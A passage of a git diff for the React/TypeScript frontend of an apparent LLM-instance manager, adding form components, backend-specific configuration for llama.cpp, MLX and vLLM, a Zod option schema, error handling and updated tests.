<div className="grid gap-2">
<Label htmlFor={id}>
{label}
</Label>
<select
id={id}
value={value || ''}
onChange={(e) => onChange(e.target.value || undefined)}
disabled={disabled}
className={`flex h-10 w-full rounded-md border border-input bg-background px-3 py-2 text-sm ring-offset-background focus-visible:outline-none focus-visible:ring-2 focus-visible:ring-ring focus-visible:ring-offset-2 disabled:cursor-not-allowed disabled:opacity-50 ${className || ''}`}
>
{options.map(option => (
<option key={option.value} value={option.value}>
{option.label}
</option>
))}
</select>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
</div>
)
}
export default SelectInput

View File

@@ -0,0 +1,47 @@
import React from 'react'
import { Input } from '@/components/ui/input'
import { Label } from '@/components/ui/label'
interface TextInputProps {
id: string
label: string
value: string | number | undefined
onChange: (value: string | undefined) => void
placeholder?: string
description?: string
disabled?: boolean
className?: string
}
const TextInput: React.FC<TextInputProps> = ({
id,
label,
value,
onChange,
placeholder,
description,
disabled = false,
className
}) => {
return (
<div className="grid gap-2">
<Label htmlFor={id}>
{label}
</Label>
<Input
id={id}
type="text"
value={typeof value === 'string' || typeof value === 'number' ? value : ''}
onChange={(e) => onChange(e.target.value || undefined)}
placeholder={placeholder}
disabled={disabled}
className={className}
/>
{description && (
<p className="text-sm text-muted-foreground">{description}</p>
)}
</div>
)
}
export default TextInput

View File

@@ -0,0 +1,53 @@
import React from 'react'
import type { CreateInstanceOptions } from '@/types/instance'
import CheckboxInput from '@/components/form/CheckboxInput'
import NumberInput from '@/components/form/NumberInput'
interface AutoRestartConfigurationProps {
formData: CreateInstanceOptions
onChange: (key: keyof CreateInstanceOptions, value: any) => void
}
const AutoRestartConfiguration: React.FC<AutoRestartConfigurationProps> = ({
formData,
onChange
}) => {
const isAutoRestartEnabled = formData.auto_restart === true
return (
<div className="space-y-4">
<h3 className="text-lg font-medium">Auto Restart Configuration</h3>
<CheckboxInput
id="auto_restart"
label="Auto Restart"
value={formData.auto_restart}
onChange={(value) => onChange('auto_restart', value)}
description="Automatically restart the instance on failure"
/>
{isAutoRestartEnabled && (
<div className="ml-6 space-y-4 border-l-2 border-muted pl-4">
<NumberInput
id="max_restarts"
label="Max Restarts"
value={formData.max_restarts}
onChange={(value) => onChange('max_restarts', value)}
placeholder="3"
description="Maximum number of restart attempts (0 = unlimited)"
/>
<NumberInput
id="restart_delay"
label="Restart Delay (seconds)"
value={formData.restart_delay}
onChange={(value) => onChange('restart_delay', value)}
placeholder="5"
description="Delay in seconds before attempting restart"
/>
</div>
)}
</div>
)
}
export default AutoRestartConfiguration

View File

@@ -0,0 +1,54 @@
import React from 'react'
import type { CreateInstanceOptions } from '@/types/instance'
import { getBasicBackendFields, getAdvancedBackendFields } from '@/lib/zodFormUtils'
import BackendFormField from '@/components/BackendFormField'
interface BackendConfigurationProps {
formData: CreateInstanceOptions
onBackendFieldChange: (key: string, value: any) => void
showAdvanced?: boolean
}
const BackendConfiguration: React.FC<BackendConfigurationProps> = ({
formData,
onBackendFieldChange,
showAdvanced = false
}) => {
const basicBackendFields = getBasicBackendFields(formData.backend_type)
const advancedBackendFields = getAdvancedBackendFields(formData.backend_type)
return (
<div className="space-y-4">
<h3 className="text-lg font-medium">Backend Configuration</h3>
{/* Basic backend fields */}
{basicBackendFields.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={(formData.backend_options as any)?.[fieldKey]}
onChange={onBackendFieldChange}
/>
))}
{/* Advanced backend fields */}
{showAdvanced && advancedBackendFields.length > 0 && (
<div className="space-y-4 pl-6 border-l-2 border-muted">
<h4 className="text-md font-medium">Advanced Backend Configuration</h4>
{advancedBackendFields
.sort()
.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={(formData.backend_options as any)?.[fieldKey]}
onChange={onBackendFieldChange}
/>
))}
</div>
)}
</div>
)
}
export default BackendConfiguration

View File

@@ -0,0 +1,117 @@
import React, { useState } from 'react'
import { BackendType, type CreateInstanceOptions } from '@/types/instance'
import { Card, CardContent, CardHeader, CardTitle } from '@/components/ui/card'
import { Button } from '@/components/ui/button'
import { Terminal, ChevronDown, ChevronRight } from 'lucide-react'
import { getBasicBackendFields, getAdvancedBackendFields } from '@/lib/zodFormUtils'
import BackendFormField from '@/components/BackendFormField'
import SelectInput from '@/components/form/SelectInput'
interface BackendConfigurationCardProps {
formData: CreateInstanceOptions
onBackendFieldChange: (key: string, value: unknown) => void
onChange: (key: keyof CreateInstanceOptions, value: unknown) => void
onParseCommand: () => void
}
const BackendConfigurationCard: React.FC<BackendConfigurationCardProps> = ({
formData,
onBackendFieldChange,
onChange,
onParseCommand
}) => {
const [showAdvanced, setShowAdvanced] = useState(false)
const basicBackendFields = getBasicBackendFields(formData.backend_type)
const advancedBackendFields = getAdvancedBackendFields(formData.backend_type)
return (
<Card>
<CardHeader>
<CardTitle>Backend Configuration</CardTitle>
</CardHeader>
<CardContent className="space-y-6">
{/* Backend Type Selection */}
<SelectInput
id="backend_type"
label="Backend Type"
value={formData.backend_type || BackendType.LLAMA_CPP}
onChange={(value) => onChange('backend_type', value)}
options={[
{ value: BackendType.LLAMA_CPP, label: 'Llama Server' },
{ value: BackendType.MLX_LM, label: 'MLX LM' },
{ value: BackendType.VLLM, label: 'vLLM' }
]}
description="Select the backend server type"
/>
{/* Parse Command Section */}
<div className="flex flex-col gap-2">
<Button
variant="outline"
onClick={onParseCommand}
className="flex items-center gap-2 w-fit"
>
<Terminal className="h-4 w-4" />
Parse Command
</Button>
<p className="text-sm text-muted-foreground">
Import settings from your backend command
</p>
</div>
{/* Basic Backend Options */}
{basicBackendFields.length > 0 && (
<div className="space-y-4">
<h3 className="text-md font-medium">Basic Backend Options</h3>
{basicBackendFields.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={(formData.backend_options as Record<string, unknown>)?.[fieldKey] as string | number | boolean | string[] | undefined}
onChange={onBackendFieldChange}
/>
))}
</div>
)}
{/* Advanced Backend Options */}
{advancedBackendFields.length > 0 && (
<div className="space-y-4">
<Button
variant="ghost"
onClick={() => setShowAdvanced(!showAdvanced)}
className="flex items-center gap-2 p-0 h-auto font-medium"
>
{showAdvanced ? (
<ChevronDown className="h-4 w-4" />
) : (
<ChevronRight className="h-4 w-4" />
)}
Advanced Backend Options
<span className="text-muted-foreground text-sm font-normal">
({advancedBackendFields.length} options)
</span>
</Button>
{showAdvanced && (
<div className="space-y-4 pl-6 border-l-2 border-muted">
{advancedBackendFields
.sort()
.map((fieldKey) => (
<BackendFormField
key={fieldKey}
fieldKey={fieldKey}
value={(formData.backend_options as Record<string, unknown>)?.[fieldKey] as string | number | boolean | string[] | undefined}
onChange={onBackendFieldChange}
/>
))}
</div>
)}
</div>
)}
</CardContent>
</Card>
)
}
export default BackendConfigurationCard

View File

@@ -0,0 +1,93 @@
import React from 'react'
import type { CreateInstanceOptions } from '@/types/instance'
import { Card, CardContent, CardHeader, CardTitle } from '@/components/ui/card'
import { Label } from '@/components/ui/label'
import { Input } from '@/components/ui/input'
import AutoRestartConfiguration from '@/components/instance/AutoRestartConfiguration'
import NumberInput from '@/components/form/NumberInput'
import CheckboxInput from '@/components/form/CheckboxInput'
import EnvironmentVariablesInput from '@/components/form/EnvironmentVariablesInput'
interface InstanceSettingsCardProps {
instanceName: string
nameError: string
isEditing: boolean
formData: CreateInstanceOptions
onNameChange: (name: string) => void
onChange: (key: keyof CreateInstanceOptions, value: unknown) => void
}
const InstanceSettingsCard: React.FC<InstanceSettingsCardProps> = ({
instanceName,
nameError,
isEditing,
formData,
onNameChange,
onChange
}) => {
return (
<Card>
<CardHeader>
<CardTitle>Instance Settings</CardTitle>
</CardHeader>
<CardContent className="space-y-6">
{/* Instance Name */}
<div className="grid gap-2">
<Label htmlFor="name">
Instance Name <span className="text-red-500">*</span>
</Label>
<Input
id="name"
value={instanceName}
onChange={(e) => onNameChange(e.target.value)}
placeholder="my-instance"
disabled={isEditing}
className={nameError ? "border-red-500" : ""}
/>
{nameError && <p className="text-sm text-red-500">{nameError}</p>}
<p className="text-sm text-muted-foreground">
Unique identifier for the instance
</p>
</div>
{/* Auto Restart Configuration */}
<AutoRestartConfiguration
formData={formData}
onChange={onChange}
/>
{/* Basic Instance Options */}
<div className="space-y-4">
<h3 className="text-lg font-medium">Basic Instance Options</h3>
<NumberInput
id="idle_timeout"
label="Idle Timeout (minutes)"
value={formData.idle_timeout}
onChange={(value) => onChange('idle_timeout', value)}
placeholder="30"
description="Minutes before stopping an idle instance"
/>
<CheckboxInput
id="on_demand_start"
label="On Demand Start"
value={formData.on_demand_start}
onChange={(value) => onChange('on_demand_start', value)}
description="Start instance only when needed"
/>
<EnvironmentVariablesInput
id="environment"
label="Environment Variables"
value={formData.environment}
onChange={(value) => onChange('environment', value)}
description="Custom environment variables for the instance"
/>
</div>
</CardContent>
</Card>
)
}
export default InstanceSettingsCard

View File

@@ -112,9 +112,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
try {
setError(null)
await instancesApi.start(name)
// Update only this instance's running status
updateInstanceInMap(name, { running: true })
// Update only this instance's status
updateInstanceInMap(name, { status: "running" })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to start instance')
}
@@ -124,9 +124,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
try {
setError(null)
await instancesApi.stop(name)
// Update only this instance's running status
updateInstanceInMap(name, { running: false })
// Update only this instance's status
updateInstanceInMap(name, { status: "stopped" })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to stop instance')
}
@@ -136,9 +136,9 @@ export const InstancesProvider = ({ children }: InstancesProviderProps) => {
try {
setError(null)
await instancesApi.restart(name)
// Update only this instance's running status
updateInstanceInMap(name, { running: true })
// Update only this instance's status
updateInstanceInMap(name, { status: "running" })
} catch (err) {
setError(err instanceof Error ? err.message : 'Failed to restart instance')
}

View File

@@ -0,0 +1,54 @@
import { createContext, useContext, useEffect, useState, type ReactNode } from "react";
type Theme = "light" | "dark";
interface ThemeContextType {
theme: Theme;
toggleTheme: () => void;
}
const ThemeContext = createContext<ThemeContextType | undefined>(undefined);
interface ThemeProviderProps {
children: ReactNode;
}
export function ThemeProvider({ children }: ThemeProviderProps) {
const [theme, setTheme] = useState<Theme>(() => {
const stored = localStorage.getItem("theme");
if (stored === "light" || stored === "dark") {
return stored;
}
return window.matchMedia("(prefers-color-scheme: dark)").matches ? "dark" : "light";
});
useEffect(() => {
const root = document.documentElement;
if (theme === "dark") {
root.classList.add("dark");
} else {
root.classList.remove("dark");
}
localStorage.setItem("theme", theme);
}, [theme]);
const toggleTheme = () => {
setTheme(prevTheme => prevTheme === "light" ? "dark" : "light");
};
return (
<ThemeContext.Provider value={{ theme, toggleTheme }}>
{children}
</ThemeContext.Provider>
);
}
export function useTheme() {
const context = useContext(ThemeContext);
if (context === undefined) {
throw new Error("useTheme must be used within a ThemeProvider");
}
return context;
}

View File

@@ -4,6 +4,7 @@ import type { ReactNode } from "react";
import { InstancesProvider, useInstances } from "@/contexts/InstancesContext";
import { instancesApi } from "@/lib/api";
import type { Instance } from "@/types/instance";
import { BackendType } from "@/types/instance";
import { AuthProvider } from "../AuthContext";
// Mock the API module
@@ -41,19 +42,19 @@ function TestComponent() {
<div data-testid="instances-count">{instances.length}</div>
{instances.map((instance) => (
<div key={instance.name} data-testid={`instance-${instance.name}`}>
{instance.name}:{instance.running.toString()}
{instance.name}:{instance.status}
</div>
))}
{/* Action buttons for testing with specific instances */}
<button
onClick={() => createInstance("new-instance", { model: "test.gguf" })}
onClick={() => createInstance("new-instance", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } })}
data-testid="create-instance"
>
Create Instance
</button>
<button
onClick={() => updateInstance("instance1", { model: "updated.gguf" })}
onClick={() => updateInstance("instance1", { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } })}
data-testid="update-instance"
>
Update Instance
@@ -99,8 +100,8 @@ function renderWithProvider(children: ReactNode) {
describe("InstancesContext", () => {
const mockInstances: Instance[] = [
{ name: "instance1", running: true, options: { model: "model1.gguf" } },
{ name: "instance2", running: false, options: { model: "model2.gguf" } },
{ name: "instance1", status: "running", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model1.gguf" } } },
{ name: "instance2", status: "stopped", options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "model2.gguf" } } },
];
beforeEach(() => {
@@ -132,10 +133,10 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false");
expect(screen.getByTestId("instances-count")).toHaveTextContent("2");
expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:true"
"instance1:running"
);
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:false"
"instance2:stopped"
);
});
});
@@ -158,8 +159,8 @@ describe("InstancesContext", () => {
it("creates instance and adds it to state", async () => {
const newInstance: Instance = {
name: "new-instance",
running: false,
options: { model: "test.gguf" },
status: "stopped",
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "test.gguf" } },
};
vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
@@ -174,14 +175,15 @@ describe("InstancesContext", () => {
await waitFor(() => {
expect(instancesApi.create).toHaveBeenCalledWith("new-instance", {
model: "test.gguf",
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "test.gguf" }
});
});
await waitFor(() => {
expect(screen.getByTestId("instances-count")).toHaveTextContent("3");
expect(screen.getByTestId("instance-new-instance")).toHaveTextContent(
"new-instance:false"
"new-instance:stopped"
);
});
});
@@ -214,8 +216,8 @@ describe("InstancesContext", () => {
it("updates instance and maintains it in state", async () => {
const updatedInstance: Instance = {
name: "instance1",
running: true,
options: { model: "updated.gguf" },
status: "running",
options: { backend_type: BackendType.LLAMA_CPP, backend_options: { model: "updated.gguf" } },
};
vi.mocked(instancesApi.update).mockResolvedValue(updatedInstance);
@@ -230,7 +232,8 @@ describe("InstancesContext", () => {
await waitFor(() => {
expect(instancesApi.update).toHaveBeenCalledWith("instance1", {
model: "updated.gguf",
backend_type: BackendType.LLAMA_CPP,
backend_options: { model: "updated.gguf" }
});
});
@@ -251,7 +254,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false");
// instance2 starts as not running
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:false"
"instance2:stopped"
);
});
@@ -262,7 +265,7 @@ describe("InstancesContext", () => {
expect(instancesApi.start).toHaveBeenCalledWith("instance2");
// The running state should be updated to true
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:true"
"instance2:running"
);
});
});
@@ -276,7 +279,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("loading")).toHaveTextContent("false");
// instance1 starts as running
expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:true"
"instance1:running"
);
});
@@ -287,7 +290,7 @@ describe("InstancesContext", () => {
expect(instancesApi.stop).toHaveBeenCalledWith("instance1");
// The running state should be updated to false
expect(screen.getByTestId("instance-instance1")).toHaveTextContent(
"instance1:false"
"instance1:stopped"
);
});
});
@@ -383,7 +386,7 @@ describe("InstancesContext", () => {
// Test that operations don't interfere with each other
const newInstance: Instance = {
name: "new-instance",
running: false,
status: "stopped",
options: {},
};
vi.mocked(instancesApi.create).mockResolvedValue(newInstance);
@@ -411,7 +414,7 @@ describe("InstancesContext", () => {
expect(screen.getByTestId("instances-count")).toHaveTextContent("3"); // Still 3
// But the running state should change
expect(screen.getByTestId("instance-instance2")).toHaveTextContent(
"instance2:true"
"instance2:running"
);
});
});

View File

@@ -1,14 +1,19 @@
// ui/src/hooks/useInstanceHealth.ts
import { useState, useEffect } from 'react'
import type { HealthStatus } from '@/types/instance'
import type { HealthStatus, InstanceStatus } from '@/types/instance'
import { healthService } from '@/lib/healthService'
export function useInstanceHealth(instanceName: string, isRunning: boolean): HealthStatus | undefined {
export function useInstanceHealth(instanceName: string, instanceStatus: InstanceStatus): HealthStatus | undefined {
const [health, setHealth] = useState<HealthStatus | undefined>()
useEffect(() => {
if (!isRunning) {
setHealth(undefined)
if (instanceStatus === "stopped") {
setHealth({ status: "unknown", lastChecked: new Date() })
return
}
if (instanceStatus === "failed") {
setHealth({ status: instanceStatus, lastChecked: new Date() })
return
}
@@ -17,9 +22,9 @@ export function useInstanceHealth(instanceName: string, isRunning: boolean): Hea
setHealth(healthStatus)
})
// Cleanup subscription on unmount or when running changes
// Cleanup subscription on unmount or when instanceStatus changes
return unsubscribe
}, [instanceName, isRunning])
}, [instanceName, instanceStatus])
return health
}

View File

@@ -1,4 +1,5 @@
import type { CreateInstanceOptions, Instance } from "@/types/instance";
import { handleApiError } from "./errorUtils";
const API_BASE = "/api/v1";
@@ -30,25 +31,8 @@ async function apiCall<T>(
headers,
});
// Handle authentication errors
if (response.status === 401) {
throw new Error('Authentication required');
}
if (!response.ok) {
// Try to get error message from response
let errorMessage = `HTTP ${response.status}`;
try {
const errorText = await response.text();
if (errorText) {
errorMessage += `: ${errorText}`;
}
} catch {
// If we can't read the error, just use status
}
throw new Error(errorMessage);
}
// Handle errors using centralized error handler
await handleApiError(response);
// Handle empty responses (like DELETE)
if (response.status === 204) {
@@ -60,6 +44,14 @@ async function apiCall<T>(
const text = await response.text();
return text as T;
} else {
// Handle empty responses for JSON endpoints
const contentLength = response.headers.get('content-length');
if (contentLength === '0' || contentLength === null) {
const text = await response.text();
if (text.trim() === '') {
return {} as T; // Return empty object for empty JSON responses
}
}
const data = await response.json() as T;
return data;
}
@@ -71,16 +63,44 @@ async function apiCall<T>(
}
}
// Server API functions
// Server API functions (moved to llama-cpp backend)
export const serverApi = {
// GET /server/help
getHelp: () => apiCall<string>("/server/help", {}, "text"),
// GET /backends/llama-cpp/help
getHelp: () => apiCall<string>("/backends/llama-cpp/help", {}, "text"),
// GET /server/version
getVersion: () => apiCall<string>("/server/version", {}, "text"),
// GET /backends/llama-cpp/version
getVersion: () => apiCall<string>("/backends/llama-cpp/version", {}, "text"),
// GET /server/devices
getDevices: () => apiCall<string>("/server/devices", {}, "text"),
// GET /backends/llama-cpp/devices
getDevices: () => apiCall<string>("/backends/llama-cpp/devices", {}, "text"),
};
// Backend API functions
export const backendsApi = {
llamaCpp: {
// POST /backends/llama-cpp/parse-command
parseCommand: (command: string) =>
apiCall<CreateInstanceOptions>('/backends/llama-cpp/parse-command', {
method: 'POST',
body: JSON.stringify({ command }),
}),
},
mlx: {
// POST /backends/mlx/parse-command
parseCommand: (command: string) =>
apiCall<CreateInstanceOptions>('/backends/mlx/parse-command', {
method: 'POST',
body: JSON.stringify({ command }),
}),
},
vllm: {
// POST /backends/vllm/parse-command
parseCommand: (command: string) =>
apiCall<CreateInstanceOptions>('/backends/vllm/parse-command', {
method: 'POST',
body: JSON.stringify({ command }),
}),
},
};
// Instance API functions
@@ -136,5 +156,5 @@ export const instancesApi = {
},
// GET /instances/{name}/proxy/health
getHealth: (name: string) => apiCall<any>(`/instances/${name}/proxy/health`),
getHealth: (name: string) => apiCall<Record<string, unknown>>(`/instances/${name}/proxy/health`),
};

View File

@@ -0,0 +1,32 @@
/**
* Parses error response from API calls and returns a formatted error message
*/
export async function parseErrorResponse(response: Response): Promise<string> {
let errorMessage = `HTTP ${response.status}`
try {
const errorText = await response.text()
if (errorText) {
errorMessage += `: ${errorText}`
}
} catch {
// If we can't read the error, just use status
}
return errorMessage
}
/**
* Handles common API call errors and throws appropriate Error objects
*/
export async function handleApiError(response: Response): Promise<void> {
// Handle authentication errors
if (response.status === 401) {
throw new Error('Authentication required')
}
if (!response.ok) {
const errorMessage = await parseErrorResponse(response)
throw new Error(errorMessage)
}
}

View File

@@ -1,27 +1,24 @@
import type { CreateInstanceOptions} from '@/schemas/instanceOptions';
import { getAllFieldKeys } from '@/schemas/instanceOptions'
import {
type LlamaCppBackendOptions,
type MlxBackendOptions,
type VllmBackendOptions,
LlamaCppBackendOptionsSchema,
MlxBackendOptionsSchema,
VllmBackendOptionsSchema,
getAllLlamaCppFieldKeys,
getAllMlxFieldKeys,
getAllVllmFieldKeys,
getLlamaCppFieldType,
getMlxFieldType,
getVllmFieldType
} from '@/schemas/instanceOptions'
// Only define the basic fields we want to show by default
export const basicFieldsConfig: Record<string, {
// LlamaCpp backend-specific basic fields
const basicLlamaCppFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
required?: boolean
}> = {
auto_restart: {
label: 'Auto Restart',
description: 'Automatically restart the instance on failure'
},
max_restarts: {
label: 'Max Restarts',
placeholder: '3',
description: 'Maximum number of restart attempts (0 = unlimited)'
},
restart_delay: {
label: 'Restart Delay (seconds)',
placeholder: '5',
description: 'Delay in seconds before attempting restart'
},
model: {
label: 'Model Path',
placeholder: '/path/to/model.gguf',
@@ -44,17 +41,135 @@ export const basicFieldsConfig: Record<string, {
}
}
export function isBasicField(key: keyof CreateInstanceOptions): boolean {
return key in basicFieldsConfig
// MLX backend-specific basic fields
const basicMlxFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
}> = {
model: {
label: 'Model',
placeholder: 'mlx-community/Mistral-7B-Instruct-v0.3-4bit',
description: 'The path to the MLX model weights, tokenizer, and config'
},
temp: {
label: 'Temperature',
placeholder: '0.0',
description: 'Default sampling temperature (default: 0.0)'
},
top_p: {
label: 'Top-P',
placeholder: '1.0',
description: 'Default nucleus sampling top-p (default: 1.0)'
},
top_k: {
label: 'Top-K',
placeholder: '0',
description: 'Default top-k sampling (default: 0, disables top-k)'
},
min_p: {
label: 'Min-P',
placeholder: '0.0',
description: 'Default min-p sampling (default: 0.0, disables min-p)'
},
max_tokens: {
label: 'Max Tokens',
placeholder: '512',
description: 'Default maximum number of tokens to generate (default: 512)'
}
}
export function getBasicFields(): (keyof CreateInstanceOptions)[] {
return Object.keys(basicFieldsConfig) as (keyof CreateInstanceOptions)[]
// vLLM backend-specific basic fields
const basicVllmFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
}> = {
model: {
label: 'Model',
placeholder: 'microsoft/DialoGPT-medium',
description: 'The name or path of the Hugging Face model to use'
},
tensor_parallel_size: {
label: 'Tensor Parallel Size',
placeholder: '1',
description: 'Number of GPUs to use for distributed serving'
},
gpu_memory_utilization: {
label: 'GPU Memory Utilization',
placeholder: '0.9',
description: 'The fraction of GPU memory to be used for the model executor'
}
}
export function getAdvancedFields(): (keyof CreateInstanceOptions)[] {
return getAllFieldKeys().filter(key => !isBasicField(key))
// Backend field configuration lookup
const backendFieldConfigs = {
mlx_lm: basicMlxFieldsConfig,
vllm: basicVllmFieldsConfig,
llama_cpp: basicLlamaCppFieldsConfig,
} as const
const backendFieldGetters = {
mlx_lm: getAllMlxFieldKeys,
vllm: getAllVllmFieldKeys,
llama_cpp: getAllLlamaCppFieldKeys,
} as const
export function getBasicBackendFields(backendType?: string): string[] {
const normalizedType = (backendType || 'llama_cpp') as keyof typeof backendFieldConfigs
const config = backendFieldConfigs[normalizedType] || basicLlamaCppFieldsConfig
return Object.keys(config)
}
export function getAdvancedBackendFields(backendType?: string): string[] {
const normalizedType = (backendType || 'llama_cpp') as keyof typeof backendFieldGetters
const fieldGetter = backendFieldGetters[normalizedType] || getAllLlamaCppFieldKeys
const basicConfig = backendFieldConfigs[normalizedType] || basicLlamaCppFieldsConfig
return fieldGetter().filter(key => !(key in basicConfig))
}
// Combined backend fields config for use in BackendFormField
export const basicBackendFieldsConfig: Record<string, {
label: string
description?: string
placeholder?: string
}> = {
...basicLlamaCppFieldsConfig,
...basicMlxFieldsConfig,
...basicVllmFieldsConfig
}
// Get field type for any backend option (union type)
export function getBackendFieldType(key: string): 'text' | 'number' | 'boolean' | 'array' {
// Try to get type from LlamaCpp schema first
try {
if (LlamaCppBackendOptionsSchema.shape && key in LlamaCppBackendOptionsSchema.shape) {
return getLlamaCppFieldType(key as keyof LlamaCppBackendOptions)
}
} catch {
// Schema might not be available
}
// Try MLX schema
try {
if (MlxBackendOptionsSchema.shape && key in MlxBackendOptionsSchema.shape) {
return getMlxFieldType(key as keyof MlxBackendOptions)
}
} catch {
// Schema might not be available
}
// Try vLLM schema
try {
if (VllmBackendOptionsSchema.shape && key in VllmBackendOptionsSchema.shape) {
return getVllmFieldType(key as keyof VllmBackendOptions)
}
} catch {
// Schema might not be available
}
// Default fallback
return 'text'
}
// Re-export the Zod-based functions
export { getFieldType } from '@/schemas/instanceOptions'

View File

@@ -0,0 +1,4 @@
// Re-export all backend schemas from one place
export * from './llamacpp'
export * from './mlx'
export * from './vllm'

View File

@@ -0,0 +1,192 @@
import { z } from 'zod'
// Define the LlamaCpp backend options schema
export const LlamaCppBackendOptionsSchema = z.object({
// Common params
verbose_prompt: z.boolean().optional(),
threads: z.number().optional(),
threads_batch: z.number().optional(),
cpu_mask: z.string().optional(),
cpu_range: z.string().optional(),
cpu_strict: z.number().optional(),
prio: z.number().optional(),
poll: z.number().optional(),
cpu_mask_batch: z.string().optional(),
cpu_range_batch: z.string().optional(),
cpu_strict_batch: z.number().optional(),
prio_batch: z.number().optional(),
poll_batch: z.number().optional(),
ctx_size: z.number().optional(),
predict: z.number().optional(),
batch_size: z.number().optional(),
ubatch_size: z.number().optional(),
keep: z.number().optional(),
flash_attn: z.boolean().optional(),
no_perf: z.boolean().optional(),
escape: z.boolean().optional(),
no_escape: z.boolean().optional(),
rope_scaling: z.string().optional(),
rope_scale: z.number().optional(),
rope_freq_base: z.number().optional(),
rope_freq_scale: z.number().optional(),
yarn_orig_ctx: z.number().optional(),
yarn_ext_factor: z.number().optional(),
yarn_attn_factor: z.number().optional(),
yarn_beta_slow: z.number().optional(),
yarn_beta_fast: z.number().optional(),
dump_kv_cache: z.boolean().optional(),
no_kv_offload: z.boolean().optional(),
cache_type_k: z.string().optional(),
cache_type_v: z.string().optional(),
defrag_thold: z.number().optional(),
parallel: z.number().optional(),
mlock: z.boolean().optional(),
no_mmap: z.boolean().optional(),
numa: z.string().optional(),
device: z.string().optional(),
override_tensor: z.array(z.string()).optional(),
gpu_layers: z.number().optional(),
split_mode: z.string().optional(),
tensor_split: z.string().optional(),
main_gpu: z.number().optional(),
check_tensors: z.boolean().optional(),
override_kv: z.array(z.string()).optional(),
lora: z.array(z.string()).optional(),
lora_scaled: z.array(z.string()).optional(),
control_vector: z.array(z.string()).optional(),
control_vector_scaled: z.array(z.string()).optional(),
control_vector_layer_range: z.string().optional(),
model: z.string().optional(),
model_url: z.string().optional(),
hf_repo: z.string().optional(),
hf_repo_draft: z.string().optional(),
hf_file: z.string().optional(),
hf_repo_v: z.string().optional(),
hf_file_v: z.string().optional(),
hf_token: z.string().optional(),
log_disable: z.boolean().optional(),
log_file: z.string().optional(),
log_colors: z.boolean().optional(),
verbose: z.boolean().optional(),
verbosity: z.number().optional(),
log_prefix: z.boolean().optional(),
log_timestamps: z.boolean().optional(),
// Sampling params
samplers: z.string().optional(),
seed: z.number().optional(),
sampling_seq: z.string().optional(),
ignore_eos: z.boolean().optional(),
temp: z.number().optional(),
top_k: z.number().optional(),
top_p: z.number().optional(),
min_p: z.number().optional(),
xtc_probability: z.number().optional(),
xtc_threshold: z.number().optional(),
typical: z.number().optional(),
repeat_last_n: z.number().optional(),
repeat_penalty: z.number().optional(),
presence_penalty: z.number().optional(),
frequency_penalty: z.number().optional(),
dry_multiplier: z.number().optional(),
dry_base: z.number().optional(),
dry_allowed_length: z.number().optional(),
dry_penalty_last_n: z.number().optional(),
dry_sequence_breaker: z.array(z.string()).optional(),
dynatemp_range: z.number().optional(),
dynatemp_exp: z.number().optional(),
mirostat: z.number().optional(),
mirostat_lr: z.number().optional(),
mirostat_ent: z.number().optional(),
logit_bias: z.array(z.string()).optional(),
grammar: z.string().optional(),
grammar_file: z.string().optional(),
json_schema: z.string().optional(),
json_schema_file: z.string().optional(),
// Example-specific params
no_context_shift: z.boolean().optional(),
special: z.boolean().optional(),
no_warmup: z.boolean().optional(),
spm_infill: z.boolean().optional(),
pooling: z.string().optional(),
cont_batching: z.boolean().optional(),
no_cont_batching: z.boolean().optional(),
mmproj: z.string().optional(),
mmproj_url: z.string().optional(),
no_mmproj: z.boolean().optional(),
no_mmproj_offload: z.boolean().optional(),
alias: z.string().optional(),
host: z.string().optional(),
port: z.number().optional(),
path: z.string().optional(),
no_webui: z.boolean().optional(),
embedding: z.boolean().optional(),
reranking: z.boolean().optional(),
api_key: z.string().optional(),
api_key_file: z.string().optional(),
ssl_key_file: z.string().optional(),
ssl_cert_file: z.string().optional(),
chat_template_kwargs: z.string().optional(),
timeout: z.number().optional(),
threads_http: z.number().optional(),
cache_reuse: z.number().optional(),
metrics: z.boolean().optional(),
slots: z.boolean().optional(),
props: z.boolean().optional(),
no_slots: z.boolean().optional(),
slot_save_path: z.string().optional(),
jinja: z.boolean().optional(),
reasoning_format: z.string().optional(),
reasoning_budget: z.number().optional(),
chat_template: z.string().optional(),
chat_template_file: z.string().optional(),
no_prefill_assistant: z.boolean().optional(),
slot_prompt_similarity: z.number().optional(),
lora_init_without_apply: z.boolean().optional(),
draft_max: z.number().optional(),
draft_min: z.number().optional(),
draft_p_min: z.number().optional(),
ctx_size_draft: z.number().optional(),
device_draft: z.string().optional(),
gpu_layers_draft: z.number().optional(),
model_draft: z.string().optional(),
cache_type_k_draft: z.string().optional(),
cache_type_v_draft: z.string().optional(),
// Audio/TTS params
model_vocoder: z.string().optional(),
tts_use_guide_tokens: z.boolean().optional(),
// Default model params
embd_bge_small_en_default: z.boolean().optional(),
embd_e5_small_en_default: z.boolean().optional(),
embd_gte_small_default: z.boolean().optional(),
fim_qwen_1_5b_default: z.boolean().optional(),
fim_qwen_3b_default: z.boolean().optional(),
fim_qwen_7b_default: z.boolean().optional(),
